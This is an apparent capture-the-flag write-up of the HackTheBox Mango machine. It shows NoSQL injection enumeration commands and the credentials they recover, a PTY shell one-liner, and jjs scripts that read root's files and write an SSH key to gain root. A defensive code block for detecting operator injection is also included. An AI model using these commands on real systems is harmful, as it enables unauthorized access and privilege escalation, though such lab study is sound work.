An example of penetration test of HTB Mango

2025-01-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article walks through a penetration test of the HTB Mango machine, step by step.

Preface

This exercise is carried out from a Kali system and follows the usual penetration testing process. The initial information gathering and ordinary injection attempts yield nothing useful. A Google search shows that Nosql-MongoDB-injection can be used to enumerate accounts and passwords; SSH is then used to connect remotely and obtain user.txt, and root.txt is finally obtained through privilege escalation.

I. Information collection

1. Target IP

The IP address is 10.129.1.219

2. Target machine ports and services

nmap -sV -A -O 10.129.1.219

This gives the open ports and version information, as well as the domain names in use.

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))

3. Website information collection

View ports 80 and 443

Port 443 serves a search interface similar to Google; some information can be obtained from its certificate.

II. Vulnerability detection and exploitation: Nosql-MongoDB-injection

Focus on port 80, which is a login interface; try to extract useful information from it through ordinary SQL injection.

A Google search shows that Nosql-MongoDB-injection scripts can be used to try to obtain account names and passwords.

Link: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login,submit:submit
python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login,submit:submit

User: admin password: t9KcS3>!0B#2

User: mango password: h4mXK8RhU~f{]f5H
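
Seen from the defending side, this enumeration is possible when the login handler accepts `username` and `password` as something other than plain strings, so that query operators reach MongoDB. The following is an added example, not code from the original article or the linked tool: it assumes a PHP-style form handler where bracketed keys such as `username[$regex]` become arrays, and the function names and sample request bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample request bodies (not captured traffic).
SAMPLES = [
    "username=alice&password=hunter2&login=login",
    "username%5B%24regex%5D=%5Ea.%2A&password%5B%24ne%5D=1&login=login",
]

def find_operator_params(body):
    """Detection: return (field, operator) for keys such as field[$op]."""
    hits = []
    for key, _value in parse_qsl(body, keep_blank_values=True):
        field, _, rest = key.partition("[")
        # Every bracketed segment becomes an array key on the server side.
        for sub in re.findall(r"([^\[\]]*)\]", rest):
            if sub.startswith("$"):
                hits.append((field, sub))
    return hits

def require_scalar_fields(body, fields):
    """Mitigation: each field must appear once, as a plain string."""
    seen = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        name = key.partition("[")[0]
        if name not in fields:
            continue
        if key != name or name in seen:
            raise ValueError("non-scalar value for %r" % name)
        seen[name] = value
    missing = [f for f in fields if f not in seen]
    if missing:
        raise ValueError("missing field(s): " + ", ".join(missing))
    return seen

if __name__ == "__main__":
    for body in SAMPLES:
        print(find_operator_params(body))
        try:
            print(require_scalar_fields(body, ("username", "password")))
        except ValueError as exc:
            print("rejected:", exc)
```

`find_operator_params` suits log or WAF review of request bodies, while `require_scalar_fields` is the check to run in the handler before any value reaches the database query.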

Log in using the obtained accounts and passwords.

Whichever account is used, the login leads to the same page.

Connect remotely over SSH and switch to the admin user; otherwise user.txt under the admin folder cannot be viewed.

III. Privilege escalation

Get an interactive shell

python -c 'import pty;pty.spawn("/bin/bash")'

Use LinEnum.sh to look for useful information

Finally, based on the output, jjs turns out to be usable for privilege escalation.

Use GTFOBins to view available scripts

Link: https://gtfobins.github.io/

(1) Obtain root.txt directly by running the file read commands in jjs

var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }

(2) Upload an SSH public key that we generate ourselves through jjs, then connect with our own private key to obtain root permission.

ssh-keygen

Fill in the script details

echo 'var FileWriter = Java.type("java.io.FileWriter"); var fw=new FileWriter("./file_to_write"); fw.write("DATA"); fw.close();' | jjs

Execute the script in the acquired shell, then log in from Kali to get root permission.
